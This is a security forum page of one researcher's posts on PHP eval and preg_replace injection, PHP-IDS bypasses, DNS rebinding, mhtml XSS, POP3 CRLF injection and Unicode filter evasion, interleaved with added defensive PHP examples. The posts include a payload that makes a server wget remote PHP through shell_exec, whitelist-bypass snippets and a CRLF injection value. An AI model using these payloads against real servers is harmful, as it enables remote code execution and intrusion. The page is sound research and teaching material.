Sla.ckers.org
Current Page: 1 of 4
Results 1 - 30 of 95
6 years ago
lpilorz
And what you meant would rather look like: http://www.securityfocus.com/archive/1/448007/100/0/threaded
Forum: Projects
6 years ago
lpilorz
It tries to upload your PHP file to the attacked server. I think this advisory explains it best: http://www.hardened-php.net/advisory_042006.119.html This vector is useful against preg_replace and sometimes eval (bugs like: <?php eval('$var="'.addslashes($_GET['var']).'";'); ?>). Simply: {${function()}} substitutes ".function()." and `` substitutes shell_exec()
Forum: Projects
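The eval() pattern quoted in the post, the {${...}} payload against it, and a hardened replacement, as an added example that is not code from the post. build_vulnerable_code(), build_safe_code() and mark_hit() are names chosen here; mark_hit() stands in for the attacker's real call (the post's payload runs `wget ...`, i.e. shell_exec()) and only records that it was invoked. The same double-quoted-string interpolation is what made preg_replace's /e modifier (replacement evaluated as PHP, removed in PHP 7) exploitable.

```php
<?php
// Added example, not code from the post: the eval() pattern quoted above,
// the {${...}} payload against it, and a hardened replacement.

// Exactly the post's construction: eval('$var="'.addslashes($_GET['var']).'";')
function build_vulnerable_code(string $input): string
{
    return '$var="' . addslashes($input) . '";';
}

// Hardened: var_export() emits a single-quoted PHP literal, and PHP does not
// interpolate {$...} or ${...} inside single-quoted strings at all.
function build_safe_code(string $input): string
{
    return '$var=' . var_export($input, true) . ';';
}

// Stand-in for the attacker's function call (hypothetical helper; the post's
// real payload runs `wget ...`, i.e. shell_exec). It only records a call.
$hit = 0;
function mark_hit(): string
{
    global $hit;
    $hit++;
    return 'x';   // becomes the variable-variable name ${'x'}
}

// addslashes() escapes only ' " \ and NUL, so { $ ( ) and ` pass through.
$payload = '{${mark_hit()}}';

echo build_vulnerable_code($payload), "\n";   // $var="{${mark_hit()}}";
eval(build_vulnerable_code($payload));
printf("vulnerable: mark_hit() called %d time(s), \$var = %s\n", $hit, var_export($var, true));
// mark_hit() ran once during string interpolation; $var holds ${'x'}, an
// undefined variable, so the call happens even though nothing useful is stored.

$hit = 0;
echo build_safe_code($payload), "\n";         // $var='{${mark_hit()}}';
eval(build_safe_code($payload));
printf("safe: mark_hit() called %d time(s), \$var = %s\n", $hit, var_export($var, true));
// 0 calls; $var is the literal string '{${mark_hit()}}'
```

The real fix is not to eval() or /e-evaluate anything derived from input at all; var_export() is shown only to make the difference between the two quoting styles concrete.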
6 years ago
lpilorz
http://demo.php-ids.org/?test=/etc/passwd is taken as alphanumeric, so the signature is not matched hxxp://demo.php-ids.org/?test=skipcentrifuge {${`wget hxxp://example.com/x.php`}} my favourite eval/preg_replace exploit edit: removing second link, was broken by forum
Forum: Projects
5 years ago
lpilorz
Finally I'll meet some sla.ckers ;)
Forum: OMG Ponies
6 years ago
lpilorz
It was mentioned on ha.ckers.org two years ago, but to tell the truth, I assumed it's not worth it for the spammer - 5 minutes of patching and the whole "campaign" is broken. I was far from being right ;) There are "top PR" sites with known vulns still unpatched for more than a year...
Forum: XSS Info
6 years ago
lpilorz
Hi, did you notice XSS vulns on high-PR sites from xssed.com are used for spamming and positioning porn sites? All the XSS vulns that I've seen used for it are also present on xssed.com. I don't think this is a coincidence. This method is nothing new, but I haven't seen it before on such a scale as it's been happening in the last few weeks. The spammer's script basically tries to inject a link to hxxp://?param
Forum: XSS Info
6 years ago
lpilorz
I just tested Google Chrome with this demo, and of course it's also vulnerable. In a real world attack, there would be no need for email (data that is sent by email could be stored in a cookie for example) - you should only make sure that the victim returns to your site (or any site that has your iframe) after some time.
Forum: Projects
6 years ago
lpilorz
http://lukasz.pilorz.net/dnsr/ - tested and working in FF3/IE7. This attack scenario is much less dangerous compared to what we could do a year ago.
Forum: Projects
6 years ago
lpilorz
If you can convince the user to stay on your site longer than whatever the timeout limit is now (long live web video!), or return to it after some time (even after closing the browser, as long as the cache is not cleaned), then probably yes, but I didn't check for some time. I'll try to put some more general demo online, if time permits.
Forum: Projects
6 years ago
lpilorz
Two more ;)
preg_replace(' /x/e ','readfile("phpwhitelist.php")','x');
$x="_SERVER"; var_dump($$x);
Forum: Projects
6 years ago
lpilorz
<?php $strpos="readfile"; ${strpos}("phpwhitelist.php") ?>
Forum: Projects
6 years ago
lpilorz
It's worse than that. Recently I've been spammed with a proposal to play an online game where players compete at who is faster at typing the words from images. The funny thing is the game is paid. So people are actually paying to download the client and solve hundreds of CAPTCHAs for someone... ;) Screenshot from the game site: http://szybkitomek.pl/gfx/screenshot_full.jpg
Forum: SPAM
6 years ago
lpilorz
I believe 1 and 3 do not allow code execution (you need partial control or a backreference in the second parameter). The exploit for the 2nd assumes register_globals=on; knowing this you should be able to change it into a universal one.
Forum: SQL and Code Injection
6 years ago
lpilorz
I'm still sure it's Acunetix - if you download free edition you should find this value hardcoded in one of the DLLs.
Forum: XSS Info
6 years ago
lpilorz
I would say it's Acunetix WVS: http://www.google.com/search?q=111-222-1933email%40address.tst+acunetix but maybe AppScan uses this value too.
Forum: XSS Info
6 years ago
lpilorz
I already found out, the only thing I could do is local network portscanning. I tried using webmail to connect to other ports from its server and simulating some other protocol using CRLF injection (could give access to local resources), but POP3 is not good for it. I thought maybe someone had already played with such things and could give some ideas for using CRLF injection in POP3. The Perl s
Forum: Networking
6 years ago
lpilorz
It usually has the possibility to add external POP3 account settings (host, username, password) and retrieve all contents at once. There is no option to RETR single entries. So I set host:port, user, pass, click OK, click "Import", and the server does: user <my_input_here> pass <my_input_here> stat list retr 1 retr 2 ... quit If the POP3 server replies with an
Forum: Networking
6 years ago
lpilorz
18. POP3
In some webmails there is an option to retrieve messages from external POP3 server. I found out some of them allow: - connecting to internal network host of the company (by IP or hostname) - selecting any port - CRLF injection, like setting password to "secret\r\nquit" (but not CSRF-able) Do you have some ideas for exploiting them? I thought of retrieving some local web content, but
Forum: Networking
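The webmail "fetch from external POP3 account" feature described in the two posts above, as an added example that is not code from the posts: how the unvalidated password field turns into a CRLF injection against the command stream, the field check that closes it, and the host/port check for the internal-network scanning angle. The function names, the simulated server and the sample credentials are all constructed here.

```php
<?php
// Added example, not code from the posts. The command sequence mirrors the
// one described above (USER, PASS, STAT, LIST, RETR n..., QUIT); the POP3
// server side is simulated by splitting the stream on CRLF.

// Builds the command stream the webmail sends. Nothing is validated, so
// CR/LF inside the credentials become extra commands on the wire.
function build_pop3_session(string $user, string $pass, int $messages): string
{
    $lines = ["USER $user", "PASS $pass", "STAT", "LIST"];
    for ($i = 1; $i <= $messages; $i++) {
        $lines[] = "RETR $i";
    }
    $lines[] = "QUIT";
    return implode("\r\n", $lines) . "\r\n";
}

// Simulated server: returns the command verbs it would process, in order.
function pop3_server_commands(string $stream): array
{
    $cmds = [];
    foreach (explode("\r\n", rtrim($stream, "\r\n")) as $line) {
        $cmds[] = strtoupper(explode(' ', $line, 2)[0]);
    }
    return $cmds;
}

// Guard for every field the webmail puts on the wire: POP3 commands are
// single CRLF-terminated lines, so no control characters may appear.
function pop3_safe_field(string $value): bool
{
    return $value !== '' && preg_match('/[\x00-\x1F\x7F]/', $value) === 0;
}

// Guard for the target: only POP3 ports, and no literal private/loopback
// addresses. Hostnames must still be resolved and the resulting address
// re-checked, otherwise DNS rebinding (see the other posts) bypasses this.
function pop3_target_allowed(string $host, int $port): bool
{
    if (!in_array($port, [110, 995], true)) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        return filter_var($host, FILTER_VALIDATE_IP, $flags) !== false;
    }
    return true;
}

$normal = build_pop3_session('alice', 'secret', 2);
echo implode(' ', pop3_server_commands($normal)), "\n";
// USER PASS STAT LIST RETR RETR QUIT

// The post's password "secret\r\nquit": the server sees QUIT right after
// PASS and closes; anything placed there instead of QUIT is executed as
// the attacker's own command sequence before the webmail's STAT/LIST/RETR.
$injected = build_pop3_session('alice', "secret\r\nquit", 2);
echo implode(' ', pop3_server_commands($injected)), "\n";
// USER PASS QUIT STAT LIST RETR RETR QUIT

foreach (['secret', "secret\r\nquit", "alice\nRETR 1"] as $field) {
    printf("%-20s -> %s\n", addcslashes($field, "\0..\37"),
        pop3_safe_field($field) ? 'accepted' : 'rejected');
}

foreach ([['pop.example.com', 110], ['10.0.0.5', 110], ['127.0.0.1', 80]] as [$host, $port]) {
    printf("%s:%d -> %s\n", $host, $port,
        pop3_target_allowed($host, $port) ? 'allowed' : 'blocked');
}
```

The field check is the part that matters for the injection; the target check only narrows the port-scanning use described in the posts and is not a substitute for resolving the hostname and checking the address actually connected to.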
6 years ago
lpilorz
I rather meant crawler configuration, to save time in case example.com/X.html is rewritten into example.com/script.php?var=X For an application with a lot of rewriting it's a must-have scanner feature, otherwise there will be millions of URLs to crawl.
Forum: Projects
6 years ago
lpilorz
To tell the truth I did not go into details with what was changed, but with the latest Java update both Kanatoko's demos (Java & LiveConnect) stopped working for me. The code I based on his presentation also started throwing Java privileges exception. "Sun has included changes that perform additional hostname matching using DNS reverse mapping data to mitigate these issues." - htt
Forum: Projects
6 years ago
lpilorz
Btw, dnsrebinding.securityexploits.com is a no-ip.com wildcard domain. That's the reason for such long timing (60 seconds to wait for no-ip.com DNS change), and it won't work for more than one victim at the same time. LiveConnect is fixed, so there is no reason to run it anyway.
Forum: Projects
6 years ago
lpilorz
Hi, are you planning to add mod_rewrite support for w3af in the future?
Forum: Projects
6 years ago
lpilorz
Hi, can anyone sum up what's the current state of DNS rebinding attack vectors? AFAIK, LiveConnect & Flash are fixed. Are there any others left, and what are the timing requirements? Btw, this no longer works so I can post it: http://lukasz.pilorz.net/testy/dnsrebinding/scanner.phps http://lukasz.pilorz.net/testy/dnsrebinding/phpmyadmin_exec.phps Sample LiveConnect DNS rebinding atta
Forum: Projects
7 years ago
lpilorz
Unfortunately I cannot find any real-world application example where Pixy gives any results other than false positives, "not found includes" or an "out of memory" error :) Any tips?
Forum: News and Links
7 years ago
lpilorz
lpilorz Wrote:
> It seems another use of mhtml bug was missed in
> discussions here:
> http://openmya.hacker.jp/hasegawa/security/ms07-03
> 4.txt
>
> By the way, if mhtml is fixed, then I think it
> will do no harm if I share my sample:
I didn't make it clear - the sample in my first post was another sample of
Forum: News and Links
7 years ago
lpilorz
In case of mhtml-XSS there is no need for redirect. I still have some problems with making it work in the real world, but a simple example is here: http://lukasz.pilorz.net/testy/mhtml/mhtml_xss.phps It is exploited like typical XSS - e.g. with: iframe src="mhtml:hxxp://lukasz.pilorz.net/testy/mhtml/mhtml_xss.php?x=" Classical XSS would not work, because the script escapes all ou
Forum: News and Links
7 years ago
lpilorz
lpilorz Wrote:
> It seems another use of mhtml bug was missed in
> discussions here:
> http://openmya.hacker.jp/hasegawa/security/ms07-03
> 4.txt
And the funny part of it - if a site used removing empty lines to protect against mhtml-redirect, it was more likely vulnerable to mhtml-XSS than a site with double line breaks i
Forum: News and Links
7 years ago
lpilorz
It seems another use of mhtml bug was missed in discussions here: http://openmya.hacker.jp/hasegawa/security/ms07-034.txt By the way, if mhtml is fixed, then I think it will do no harm if I share my sample: http://lukasz.pilorz.net/testy/mhtml/index.phps http://lukasz.pilorz.net/testy/mhtml/mhtml_js.phps It's nothing new - the script reads values of some input fields from given page, and
Forum: News and Links
7 years ago
lpilorz
When I tested it over a month ago (April, 12) it seemed to be fixed. Regression?
Forum: XSS Info
7 years ago
lpilorz
Maybe someone will find it useful - these Unicode chars may be converted to special chars (<,>,',"): http://lukasz.pilorz.net/testy/unicode_conversion/ The first two are the most interesting, because they exist in ISO-8859-1, but no other popular single-byte encoding.
Forum: News and Links
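One concrete mechanism behind the post above, as an added example that is not code from the post: Unicode compatibility characters such as the fullwidth forms U+FF1C/U+FF1E/U+FF07/U+FF02 are mapped to plain <, >, ' and " by NFKC normalization, so a filter that runs before a later normalization (or best-fit charset conversion) step sees nothing suspicious. The post's table may document other conversion paths; this example covers only NFKC and assumes ext/intl (the Normalizer class) is available. The function names are chosen here.

```php
<?php
// Added example, not code from the post. Shows why a filter that inspects
// the raw input misses characters that a later NFKC normalization turns
// into < > ' ". Assumes ext/intl for the Normalizer class.

if (!class_exists('Normalizer')) {
    fwrite(STDERR, "ext/intl (Normalizer) is required for this example\n");
    exit(1);
}

// Naive filter: flags a string only if the ASCII specials are already there.
function contains_ascii_specials(string $s): bool
{
    return preg_match('/[<>\'"]/', $s) === 1;
}

// What a downstream normalizing component produces (compatibility mapping).
function normalize_nfkc(string $s): string
{
    return Normalizer::normalize($s, Normalizer::FORM_KC);
}

// Correct order: normalize to the canonical form first, then encode/filter.
function encode_after_normalize(string $s): string
{
    return htmlspecialchars(normalize_nfkc($s), ENT_QUOTES, 'UTF-8');
}

// Constructed payload built from fullwidth forms only (no ASCII < > ' ").
$payload = "\u{FF1C}script\u{FF1E}alert(\u{FF07}x\u{FF07})\u{FF1C}/script\u{FF1E}";

printf("raw input flagged:        %s\n", contains_ascii_specials($payload) ? 'yes' : 'no');
// no  -> the filter passes it

$normalized = normalize_nfkc($payload);
printf("after NFKC:               %s\n", $normalized);
// <script>alert('x')</script>
printf("normalized input flagged: %s\n", contains_ascii_specials($normalized) ? 'yes' : 'no');
// yes -> the same filter now catches it

printf("safe output:              %s\n", encode_after_normalize($payload));
// &lt;script&gt;alert(&#039;x&#039;)&lt;/script&gt;
```

The rule this illustrates is ordering: any normalization, transliteration or charset conversion must happen before validation and output encoding, never after, or the filtered form and the rendered form are different strings.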